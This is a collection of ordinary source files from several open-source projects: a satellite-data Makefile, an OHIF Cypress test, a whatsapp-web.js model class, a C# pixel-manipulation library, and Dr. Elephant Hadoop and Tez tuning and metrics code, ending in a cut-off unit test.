s3://dea-public-data/baseline/ga_s2bm_ard_provisional_3/51/KWR/2021/09/02_nrt/20210902T033620/ga_s2bm_ard_provisional_3-2-1_51KWR_2021-09-02_nrt.odc-metadata.yaml \
quickstart: initdb metadata product index index-geomedian metadata-s2-nrt product-s2-nrt metadata-eo_plus index-s2-nrt product-s2be index-s2be product-s2-c3
index-ba-bm-s2:
docker-compose exec alchemist \
datacube dataset add --ignore-lineage --confirm-ignore-lineage \
s3://dea-public-data/derivative/ga_s2_ba_bm_3/1-6-0/54/HVE/2021/07/22/20210722T015557/ga_s2_ba_bm_3_54HVE_2021-07-22_interim.odc-metadata.yaml
# Landsat 8, 7 and 5 respectively
THREE_SCENES=600645a5-5256-4632-a13d-fa13d1c11a8f 8b215983-ae1b-45bd-ad63-7245248bd41b 3fda2741-e810-4d3e-a54a-279fc3cd795f
wofs-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_wo.yaml \
--uuid 600645a5-5256-4632-a13d-fa13d1c11a8f
wofs-many:
docker-compose exec alchemist \
datacube-alchemist run-many --config-file ./examples/c3_config_wo.yaml --limit=2 \
time in 2020-01
fc-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_fc.yaml \
--uuid 600645a5-5256-4632-a13d-fa13d1c11a8f
ard-c2-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/config_ba_L3_ARD_provisional.yaml \
--uuid 3e846ef0-5e7a-402e-b1a0-27e319ca78da
ard-c3-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/config_ba_C2_ARD_provisional.yaml \
--uuid 5c70a4a2-cf36-4779-92a8-b35b8039cb0a
bai-one:
docker-compose exec alchemist \
datacube-alchemist run-one --config-file ./examples/c3_config_bai_s2be.yaml \
--uuid 8ed63ad1-875e-4823-87f4-8431bbd1e899
wofs-one-of-each:
docker-compose exec alchemist \
bash -c \
"echo '${THREE_SCENES}' | xargs -n1 datacube-alchemist run-one ./examples/c3_config_wo.yaml"
fc-one-of-each:
docker-compose exec alchemist \
bash -c \
"echo '${THREE_SCENES}' | xargs -n1 datacube-alchemist run-one ./examples/c3_config_fc.yaml"
find_missing:
docker-compose exec alchemist \
datacube-alchemist add-missing-to-queue --config-file ./examples/c3_config_wo.yaml \
--queue alex-dev-alive \
--dryrun
# Africa Examples
product-africa:
docker-compose exec alchemist \
datacube product add \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls8_sr.odc-product.yaml \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls7_sr.odc-product.yaml \
https://raw.githubusercontent.com/digitalearthafrica/config/master/products/ls5_sr.odc-product.yaml
index-africa:
docker-compose exec --env AWS_DEFAULT_REGION=af-south-1 alchemist \
bash -c "\
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/oli-tirs/2017/160/071/LC08_L2SP_160071_20170830_20200903_02_T1/*SR_stac.json \
ls8_sr && \
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/etm/2021/170/052/LE07_L2SP_170052_20210316_20210412_02_T1/*_SR_stac.json \
ls7_sr && \
s3-to-dc --stac --no-sign-request \
s3://deafrica-landsat/collection02/level-2/standard/tm/1994/176/044/LT05_L2SP_176044_19940714_20210402_02_T1/*_SR_stac.json \
ls5_sr"
wo-africa-one:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist \
datacube-alchemist run-one --config-file ./examples/wofs_ls.alchemist.yaml \
--uuid 1f88087d-0da6-55be-aafb-5e370520e405
fc-africa-one:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist \
datacube-alchemist run-one --config-file ./examples/fc_ls.alchemist.yaml \
--uuid 1f88087d-0da6-55be-aafb-5e370520e405
THREE_AFRICA=1f88087d-0da6-55be-aafb-5e370520e405 272c298f-03e3-5a08-a584-41a0a3c3cb95 834d56e2-7465-5980-a6af-615ef0f67e28
wo-africa-three:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist bash -c\
"echo '${THREE_AFRICA}' | \
xargs -n1 datacube-alchemist run-one --config-file ./examples/wofs_ls.alchemist.yaml --uuid \
"
fc-africa-three:
docker-compose exec \
--env AWS_DEFAULT_REGION=af-south-1 \
--env AWS_S3_ENDPOINT=s3.af-south-1.amazonaws.com \
alchemist bash -c\
"echo '${THREE_AFRICA}' | \
xargs -n1 datacube-alchemist run-one --config-file ./examples/fc_ls.alchemist.yaml --uuid \
"
# Queue testing
wofs-to-queue:
docker-compose exec alchemist \
datacube-alchemist add-to-queue --config-file ./examples/c3_config_wo.yaml --queue alex-dev-alive \
--limit=300 --product-limit=100
wofs-from-queue:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_wo.yaml --queue alex-dev-alive \
--limit=1 --queue-timeout=600 --dryrun
fc-to-queue:
docker-compose exec alchemist \
datacube-alchemist add-to-queue --config-file ./examples/c3_config_fc.yaml --queue alex-dev-alive \
--limit=20 --product-limit=5
fc-from-queue:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_fc.yaml --queue alex-dev-alive \
--limit=1 --queue-timeout=1200
fc-deadletter:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_fc.yaml \
--queue dea-dev-eks-alchemist-c3-processing-fc-deadletter \
--queue-timeout=1200
wo-deadletter:
docker-compose exec alchemist \
datacube-alchemist run-from-queue --config-file ./examples/c3_config_wo.yaml \
--queue dea-dev-eks-alchemist-c3-processing-wo-deadletter \
--queue-timeout=1200
| erin-telfer/datacube-alchemist |
<|start_filename|>platform/viewer/cypress/integration/visual-regression/PercyCheckOHIFRoutes.spec.js<|end_filename|>
//We excluded the tests for '**/studies/**' because the bulk/all of our other study/viewer tests use this route
describe('Visual Regression - OHIF Routes', function() {
beforeEach(function() {
cy.openStudyList();
});
/*
// TODO -> Bring back when testJSON is hosted again.
it('checks TEST json url study route', function() {
cy.visit(
'/viewer?url=https://ohif-viewer.s3.eu-central-1.amazonaws.com/JSON/testJSON.json'
);
cy.server();
cy.route('GET', '**/ TESTStudy; /**').as('getTESTStudy');
cy.wait('@getTESTStudy.all');
cy.get('@getTESTStudy').should($route => {
expect($route.status).to.be.eq(200);
});
cy.percyCanvasSnapshot('TEST json study route');
});
*/
});
| zhjfu/Viewers |
<|start_filename|>src/structures/ProductMetadata.js<|end_filename|>
const Base = require('./Base');
class ProductMetadata extends Base {
constructor(client, data) {
super(client);
if (data) this._patch(data);
}
_patch(data) {
/** Product ID */
this.id = data.id;
/** Retailer ID */
this.retailer_id = data.retailer_id;
/** Product Name */
this.name = data.name;
/** Product Description */
this.description = data.description;
return super._patch(data);
}
}
module.exports = ProductMetadata; | BagasNS/whatsapp-web.js |
<|start_filename|>PixelMap/Pixel.cs<|end_filename|>
using System;
using System.CodeDom;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PixelMapSharp
{
public struct Pixel
{
/// <summary>
/// Creates a pixel from a System.Drawing color.</summary>
public Pixel(Color c)
{
A = c.A;
R = c.R;
G = c.G;
B = c.B;
}
/// <summary>
/// Creates a pixel from integer RGB values.</summary>
public Pixel(int r, int g, int b) : this((byte)r, (byte)g, (byte)b) { }
/// <summary>
/// Creates a pixel from ARGB values.</summary>
public Pixel(int a, int r, int g, int b) : this((byte)a, (byte)r, (byte)g, (byte)b) { }
/// <summary>
/// Creates a pixel from RGB values.</summary>
public Pixel(byte r, byte g, byte b)
{
A = 255;
R = r;
G = g;
B = b;
}
/// <summary>
/// Creates a pixel from ARGB values.</summary>
public Pixel(byte a, byte r, byte g, byte b)
{
A = a;
R = r;
G = g;
B = b;
}
/// <summary>
/// Creates a pixel from HSL-A values.</summary>
public Pixel(double hue, double saturation, double lightness, byte alpha)
{
lightness %= 1;
saturation %= 1;
double q = lightness < 0.5 ? lightness * (1 + saturation) : lightness + saturation - lightness * saturation;
double p = 2 * lightness - q;
hue %= 360;
hue /= 360f;
double r = hueToRGB(p, q, hue + 1 / 3f);
double g = hueToRGB(p, q, hue);
double b = hueToRGB(p, q, hue - 1 / 3f);
A = alpha;
R = window(r * 255);
G = window(g * 255);
B = window(b * 255);
}
/// <summary>
/// Creates a pixel from HSL values.</summary>
public Pixel(double hue, double saturation, double lightness)
: this(hue, saturation, lightness, 255)
{ }
private static double hueToRGB(double p, double q, double t)
{
if (t < 0) t += 1;
if (t > 1) t -= 1;
if (t < 1 / 6f) return p + (q - p) * 6 * t;
if (t < 1 / 2f) return q;
if (t < 2 / 3f) return p + (q - p) * (2 / 3f - t) * 6;
return p;
}
private static byte window(double c)
{
return (byte)Math.Min(Math.Max(0, c), 255);
}
/// <summary>
/// The alpha value of the Pixel from 0 to 255.</summary>
public byte A;
/// <summary>
/// The red value of the Pixel from 0 to 255.</summary>
public byte R;
/// <summary>
/// The green value of the Pixel from 0 to 255.</summary>
public byte G;
/// <summary>
/// The blue value of the Pixel from 0 to 255.</summary>
public byte B;
/// <summary>
/// The alpha value of the Pixel from 0 to 1.</summary>
public double AValue { get { return A / 255d; } set { A = (byte)(value * 255d); } }
/// <summary>
/// The red value of the Pixel from 0 to 1.</summary>
public double RValue { get { return R / 255d; } set { R = (byte)(value * 255d); } }
/// <summary>
/// The green value of the Pixel from 0 to 1.</summary>
public double GValue { get { return G / 255d; } set { G = (byte)(value * 255d); } }
/// <summary>
/// The blue value of the Pixel from 0 to 1.</summary>
public double BValue { get { return B / 255d; } set { B = (byte)(value * 255d); } }
/// <summary>
/// The Hue value of the Pixel, radially spanning from 0 to 360 degrees.</summary>
public double Hue
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
double delta = max - min;
double hue = 0.0f;
if (r == max)
{
hue = (g - b) / delta;
}
else if (g == max)
{
hue = 2 + (b - r) / delta;
}
else if (b == max)
{
hue = 4 + (r - g) / delta;
}
hue *= 60;
if (hue < 0.0f)
{
hue += 360.0f;
}
if (double.IsNaN(hue))
return 0;
return hue;
}
set
{
this = new Pixel(value, Saturation, Lightness, A);
}
}
/// <summary>
/// The saturation value of the Pixel.</summary>
public double Saturation
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double l;
double s = 0;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
// if max == min, then there is no color and
// the saturation is zero.
if (max != min)
{
l = (max + min) / 2;
if (l <= .5)
{
s = (max - min) / (max + min);
}
else
{
s = (max - min) / (2 - max - min);
}
}
return s;
}
set
{
this = new Pixel(Hue, value, Lightness, A);
}
}
/// <summary>
/// The lightness value of the Pixel.</summary>
public double Lightness
{
get
{
double r = R / 255.0f;
double g = G / 255.0f;
double b = B / 255.0f;
double max = r;
double min = r;
if (g > max) max = g;
if (b > max) max = b;
if (g < min) min = g;
if (b < min) min = b;
return (max + min) / 2;
}
set
{
this = new Pixel(Hue, Saturation, value, A);
}
}
/// <summary>
/// The GDI color equivalent.</summary>
public Color Color
{
get { return Color.FromArgb(A, R, G, B); }
set { this = new Pixel(value.A, value.R, value.G, value.B); }
}
/// <summary>
/// Additive mix of two pixels.</summary>
public static Pixel operator +(Pixel a, Pixel b)
{
return new Pixel(
(byte)((a.AValue / 2 + b.AValue / 2) * 255),
(byte)((a.RValue / 2 + b.RValue / 2) * 255),
(byte)((a.GValue / 2 + b.GValue / 2) * 255),
(byte)((a.BValue / 2 + b.BValue / 2) * 255));
}
/// <summary>
/// Multiplicative mix of two pixels.</summary>
public static Pixel operator *(Pixel a, Pixel b)
{
return new Pixel(
(byte)((a.AValue * b.AValue) * 255),
(byte)((a.RValue * b.RValue) * 255),
(byte)((a.GValue * b.GValue) * 255),
(byte)((a.BValue * b.BValue) * 255));
}
/// <summary>
/// Difference mix of two pixels.</summary>
public static Pixel operator -(Pixel a, Pixel b)
{
return new Pixel(
(byte)(Math.Abs(a.AValue / 2 - b.AValue / 2) * 255),
(byte)(Math.Abs(a.RValue / 2 - b.RValue / 2) * 255),
(byte)(Math.Abs(a.GValue / 2 - b.GValue / 2) * 255),
(byte)(Math.Abs(a.BValue / 2 - b.BValue / 2) * 255));
}
}
}
<|start_filename|>PixelMapSamples/Program.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using PixelMapSharp;
namespace PixelMapSamples
{
class Program
{
static void Main(string[] args)
{
//Quickly load a PixelMap through a Bitmap
PixelMap map = new PixelMap("Lenna.png");
for (int x = 0; x < map.Width; x++)
{
for (int y = 0; y < map.Height; y++)
{
//Sample a pixel
Pixel pixel = map[x, y];
//Create a hue value
double value = ((double)x / map.Width) * 360d;
//Set the hue value to our sample
pixel.Hue = value;
//Return our sample to the PixelMap
map[x, y] = pixel;
}
}
//Save the PixelMap through a Bitmap
map.GetBitmap().Save("output.png");
}
}
}
<|start_filename|>PixelMap/PixelMap.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace PixelMapSharp
{
/// <summary>
/// A container of mutable pixel data.</summary>
public class PixelMap
{
/// <summary>
/// Creates a blank PixelMap of desired width and height.</summary>
public PixelMap(int width, int height)
{
Width = width;
Height = height;
map = new Pixel[Width, Height];
BPP = 4;
format = PixelFormat.Format32bppArgb;
}
/// <summary>
/// Clones a PixelMap.</summary>
public PixelMap(PixelMap original)
{
Width = original.Width;
Height = original.Height;
map = new Pixel[Width, Height];
BPP = original.BPP;
format = original.format;
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
this[x, y] = original[x, y];
}
}
}
/// <summary>
/// Quickly creates a PixelMap from a file path.</summary>
public PixelMap(string s) : this(new Bitmap(s))
{ }
/// <summary>
/// Quickly creates a PixelMap from a Bitmap.</summary>
/// <seealso cref="PixelMap.SlowLoad">
/// Copies a Bitmap through slow pixel-by-pixel reads. </seealso>
public PixelMap(Bitmap b)
{
Width = b.Width;
Height = b.Height;
map = new Pixel[Width, Height];
format = b.PixelFormat;
var data = b.LockBits(new Rectangle(0, 0, Width, Height), ImageLockMode.ReadOnly, format);
switch (b.PixelFormat)
{
case PixelFormat.Format32bppArgb:
case PixelFormat.Format32bppRgb:
BPP = 4;
break;
case PixelFormat.Format24bppRgb:
BPP = 3;
break;
default:
throw new FormatException("PixelFormat cannot be loaded. Try PixelMap.SlowLoad instead.");
}
int bytes = Math.Abs(data.Stride) * b.Height;
byte[] raw = new byte[bytes];
System.Runtime.InteropServices.Marshal.Copy(data.Scan0, raw, 0, bytes);
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
int offset = (y * data.Width + x) * BPP;
byte B = raw[offset];
offset++;
byte G = raw[offset];
offset++;
byte R = raw[offset];
byte A = 0;
if (BPP == 4)
{
offset++;
A = raw[offset];
}
map[x, y] = new Pixel(A, R, G, B);
}
}
b.UnlockBits(data);
}
/// <summary>
/// The width of the PixelMap in pixels.</summary>
public readonly int Width;
/// <summary>
/// The height of the PixelMap in pixels.</summary>
public readonly int Height;
private readonly Pixel[,] map;
private readonly int BPP;
private readonly PixelFormat format;
/// <summary>
/// Access a Pixel of the PixelMap from its X and Y coordinates.</summary>
public Pixel this[int x, int y]
{
get
{
if (Inside(new Point(x, y)))
return map[x, y];
return map[Math.Max(Math.Min(x, Width - 1), 0), Math.Max(Math.Min(y, Height - 1), 0)];
}
set
{
if (Inside(new Point(x, y)))
map[x, y] = value;
}
}
/// <summary>
/// Access a Pixel of the PixelMap from its X and Y coordinates contained within a Point.</summary>
public Pixel this[Point p]
{
get { return this[p.X, p.Y]; }
set { this[p.X, p.Y] = value; }
}
/// <summary>
/// Access a Pixel of the PixelMap from its flattened index.</summary>
public Pixel this[int i]
{
get { return this[i / Height, i % Height]; }
set { this[i / Height, i % Height] = value; }
}
/// <summary>
/// Determine if a point is within this PixelMap.</summary>
public bool Inside(Point p)
{
return (p.X >= 0 && p.Y >= 0 && p.X < Width && p.Y < Height);
}
/// <summary>
/// Produce a Bitmap from this PixelMap.</summary>
public Bitmap GetBitmap()
{
var bitmap = new Bitmap(Width, Height);
var data = bitmap.LockBits(new Rectangle(0, 0, Width, Height), ImageLockMode.WriteOnly, format);
int bytes = Math.Abs(data.Stride) * bitmap.Height;
byte[] raw = new byte[bytes];
for (int x = 0; x < Width; x++)
{
for (int y = 0; y < Height; y++)
{
int offset = (y * data.Width + x) * BPP;
Pixel p = this[x, y];
raw[offset] = p.B;//BLUE
offset++;
raw[offset] = p.G;//GREEN
offset++;
raw[offset] = p.R;//RED
if (BPP == 4)
{
offset++;
raw[offset] = p.A;//ALPHA
}
}
}
System.Runtime.InteropServices.Marshal.Copy(raw, 0, data.Scan0, bytes);
bitmap.UnlockBits(data);
return bitmap;
}
/// <summary>
/// Load a Bitmap pixel-by-pixel, slowly.</summary>
public static PixelMap SlowLoad(Bitmap b)
{
PixelMap m = new PixelMap(b.Width, b.Height);
for (int x = 0; x < b.Width; x++)
{
for (int y = 0; y < b.Height; y++)
{
m[x, y] = new Pixel(b.GetPixel(x, y));
}
}
return m;
}
}
}
| ruarai/PixelMap |
<|start_filename|>app/views/tags/aggregatedMetrics.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(result: models.AppResult)
@import com.linkedin.drelephant.util.Utils;
@if(result.resourceUsed != 0) {
<p class="list-group-item-heading">
<table>
<tr>
<td class="metrics-dashboard hasTooltip" width="175px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=resources">--><img src='@routes.Assets.at("images/usedmemory.png")' class="metrics-icons" alt='used resources'/><!--</a>--> @Utils.getResourceInGBHours(result.resourceUsed) <div id="tooltip-div">
<span> The resources used by the job in GB Hours</span>
</div></td>
<td class="metrics-dashboard hasTooltip" width="100px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=resources">--><img src='@routes.Assets.at("images/wastedmemory.png")' class="metrics-icons" alt='wasted resources'/><!--</a>--> @(Utils.getPercentage(result.resourceWasted, result.resourceUsed)) <div id="tooltip-div">
<span> The percent of resources wasted</span>
</div></td>
<td class="metrics-dashboard hasTooltip" width="120px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=time">--><img src='@routes.Assets.at("images/runtime.png")' class="metrics-icons" alt='total runtime'/><!--</a>--> @(Utils.getDurationBreakdown(result.finishTime - result.startTime)) <div id="tooltip-div">
<span> Total runtime of the job in HH:MM:SS</span>
</div></td>
@if(!result.jobType.equals("Spark")) {
<td class="metrics-dashboard hasTooltip" width="100px"><!--<a href="./jobhistory?job-def-id=@**@helper.urlEncode(result.jobDefId)&select-graph-type=time">--><img src='@routes.Assets.at("images/waittime.png")' class="metrics-icons" alt='total wait time'/><!--</a>--> @(Utils.getPercentage(result.totalDelay, result.finishTime - result.startTime)) <div id="tooltip-div">
<span> The percent of time job waited</span>
</div></td>
}
</tr>
</table>
</p>
}
<|start_filename|>app/com/linkedin/drelephant/AutoTuner.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant;
import org.apache.hadoop.conf.Configuration;
import org.apache.log4j.Logger;
import com.linkedin.drelephant.analysis.HDFSContext;
import com.linkedin.drelephant.tuning.AzkabanJobCompleteDetector;
import com.linkedin.drelephant.tuning.BaselineComputeUtil;
import com.linkedin.drelephant.tuning.FitnessComputeUtil;
import com.linkedin.drelephant.tuning.JobCompleteDetector;
import com.linkedin.drelephant.tuning.PSOParamGenerator;
import com.linkedin.drelephant.tuning.ParamGenerator;
import com.linkedin.drelephant.util.Utils;
import controllers.AutoTuningMetricsController;
/**
*This class is the AutoTuner Daemon class which runs following thing in order.
* - BaselineComputeUtil: Baseline computation for new jobs which are auto tuning enabled
* - JobCompleteDetector: Detect if the current execution of the jobs is completed and update the status in DB
* - APIFitnessComputeUtil: Compute the recently succeeded jobs fitness
* - ParamGenerator : Generate the next set of parameters for suggestion
*/
public class AutoTuner implements Runnable {
public static final long ONE_MIN = 60 * 1000;
private static final Logger logger = Logger.getLogger(AutoTuner.class);
private static final long DEFAULT_METRICS_COMPUTATION_INTERVAL = ONE_MIN / 5;
public static final String AUTO_TUNING_DAEMON_WAIT_INTERVAL = "autotuning.daemon.wait.interval.ms";
public void run() {
logger.info("Starting Auto Tuning thread");
HDFSContext.load();
Configuration configuration = ElephantContext.instance().getAutoTuningConf();
Long interval =
Utils.getNonNegativeLong(configuration, AUTO_TUNING_DAEMON_WAIT_INTERVAL, DEFAULT_METRICS_COMPUTATION_INTERVAL);
try {
AutoTuningMetricsController.init();
BaselineComputeUtil baselineComputeUtil = new BaselineComputeUtil();
FitnessComputeUtil fitnessComputeUtil = new FitnessComputeUtil();
ParamGenerator paramGenerator = new PSOParamGenerator();
JobCompleteDetector jobCompleteDetector = new AzkabanJobCompleteDetector();
while (!Thread.currentThread().isInterrupted()) {
try {
baselineComputeUtil.computeBaseline();
jobCompleteDetector.updateCompletedExecutions();
fitnessComputeUtil.updateFitness();
paramGenerator.getParams();
} catch (Exception e) {
logger.error("Error in auto tuner thread ", e);
}
Thread.sleep(interval);
}
} catch (Exception e) {
logger.error("Error in auto tuner thread ", e);
}
logger.info("Auto tuning thread shutting down");
}
}
<|start_filename|>app/com/linkedin/drelephant/tez/TezTaskLevelAggregatedMetrics.java<|end_filename|>
/*
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import com.linkedin.drelephant.math.Statistics;
import java.util.ArrayList;
import java.util.List;
import org.apache.commons.io.FileUtils;
import org.apache.log4j.Logger;
/**
* Aggregation functionality for task level metrics
*/
public class TezTaskLevelAggregatedMetrics {
private static final Logger logger = Logger.getLogger(TezTaskLevelAggregatedMetrics.class);
private long _delay = 0;
private long _resourceWasted = 0;
private long _resourceUsed = 0;
private List<Long> finishTimes = new ArrayList<Long>();
private List<Long> durations = new ArrayList<Long>();
private static final double MEMORY_BUFFER = 1.5;
private static final double CLUSTER_MEMORY_FACTOR = 2.1;
/**
* Returns the nth percentile finish job
* @param percentile The percentile of finish job to return
* @return The nth percentile finish job
*/
public long getNthPercentileFinishTime(int percentile)
{
if(finishTimes == null || finishTimes.size() == 0 ) {
return -1;
}
return Statistics.percentile(finishTimes, percentile);
}
/**
* Constructor for TaskLevelAggregatedMetrics
* @param taskData Array containing the task data for mappers and/or reducers
* @param containerSize The container size of the tasks
* @param idealStartTime The ideal start time for the task. For mappers it is the submit time, for
* reducers, it is the time when the number of completed maps become more than
* the slow start time.
*/
public TezTaskLevelAggregatedMetrics(TezTaskData[] taskData, long containerSize, long idealStartTime) {
compute(taskData, containerSize, idealStartTime);
}
/**
* Returns the overall delay for the tasks.
* @return The delay of the tasks.
*/
public long getDelay() {
return _delay;
}
/**
* Retruns the resources wasted by all the tasks in MB Seconds
* @return The wasted resources of all the tasks in MB Seconds
*/
public long getResourceWasted() {
return _resourceWasted;
}
/**
* Returns the resource used by all the tasks in MB Seconds
* @return The total resources used by all tasks in MB Seconds
*/
public long getResourceUsed() {
return _resourceUsed;
}
/**
* Computes the aggregated metrics -> peakMemory, delay, total task duration, wasted resources and memory usage.
* @param taskDatas
* @param containerSize
* @param idealStartTime
*/
private void compute(TezTaskData[] taskDatas, long containerSize, long idealStartTime) {
long peakMemoryNeed = 0;
long taskFinishTimeMax = 0;
long taskDurationMax = 0;
// if there are zero tasks, then nothing to compute.
if(taskDatas == null || taskDatas.length == 0) {
return;
}
for (TezTaskData taskData: taskDatas) {
if (!taskData.isSampled()) {
continue;
}
long taskMemory = taskData.getCounters().get(TezCounterData.CounterName.PHYSICAL_MEMORY_BYTES)/ FileUtils.ONE_MB; // MB
long taskVM = taskData.getCounters().get(TezCounterData.CounterName.VIRTUAL_MEMORY_BYTES)/ FileUtils.ONE_MB; // MB
long taskDuration = taskData.getFinishTime() - taskData.getStartTime(); // Milliseconds
long taskCost = (containerSize) * (taskDuration / Statistics.SECOND_IN_MS); // MB Seconds
durations.add(taskDuration);
finishTimes.add(taskData.getFinishTime());
//peak Memory usage
long memoryRequiredForVM = (long) (taskVM/CLUSTER_MEMORY_FACTOR);
long biggerMemoryRequirement = memoryRequiredForVM > taskMemory ? memoryRequiredForVM : taskMemory;
peakMemoryNeed = biggerMemoryRequirement > peakMemoryNeed ? biggerMemoryRequirement : peakMemoryNeed;
if(taskFinishTimeMax < taskData.getFinishTime()) {
taskFinishTimeMax = taskData.getFinishTime();
}
if(taskDurationMax < taskDuration) {
taskDurationMax = taskDuration;
}
_resourceUsed += taskCost;
}
// Compute the delay in starting the task.
_delay = taskFinishTimeMax - (idealStartTime + taskDurationMax);
// invalid delay
if(_delay < 0) {
_delay = 0;
}
// wastedResources
long wastedMemory = containerSize - (long) (peakMemoryNeed * MEMORY_BUFFER);
if(wastedMemory > 0) {
for (long duration : durations) {
_resourceWasted += (wastedMemory) * (duration / Statistics.SECOND_IN_MS); // MB Seconds
}
}
}
}
<|start_filename|>app/models/JobSavedState.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import java.sql.Timestamp;
import javax.persistence.Column;
import play.db.ebean.Model;
import javax.persistence.Entity;
import javax.persistence.Id;
import javax.persistence.Table;
import com.avaje.ebean.annotation.UpdatedTimestamp;
@Entity
@Table(name = "job_saved_state")
public class JobSavedState extends Model {
private static final long serialVersionUID = 1L;
public static class TABLE {
public static final String TABLE_NAME = "job_saved_state";
public static final String jobDefinitionId = "jobDefinitionId";
public static final String savedState = "savedState";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
public Integer jobDefinitionId;
@Column(nullable = false)
public byte[] savedState;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
public boolean isValid() {
return jobDefinitionId != null && savedState != null;
}
public static Finder<Integer, JobSavedState> find =
new Finder<Integer, JobSavedState>(Integer.class, JobSavedState.class);
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
}
<|start_filename|>test/com/linkedin/drelephant/tez/TezTaskLevelAggregatedMetricsTest.java<|end_filename|>
/*
* Copyright 2017 Electronic Arts Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez;
import com.linkedin.drelephant.tez.data.TezCounterData;
import com.linkedin.drelephant.tez.data.TezTaskData;
import org.junit.Assert;
import org.junit.Test;
public class TezTaskLevelAggregatedMetricsTest {
@Test
public void testZeroTasks() {
TezTaskData taskData[] = {};
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(taskData, 0, 0);
Assert.assertEquals(taskMetrics.getDelay(), 0);
Assert.assertEquals(taskMetrics.getResourceUsed(), 0);
Assert.assertEquals(taskMetrics.getResourceWasted(), 0);
}
@Test
public void testNullTaskArray() {
TezTaskLevelAggregatedMetrics taskMetrics = new TezTaskLevelAggregatedMetrics(null, 0, 0);
Assert.assertEquals(taskMetrics.getDelay(), 0);
Assert.assertEquals(taskMetrics.getResourceUsed(), 0);
Assert.assertEquals(taskMetrics.getResourceWasted(), 0);
}
@Test
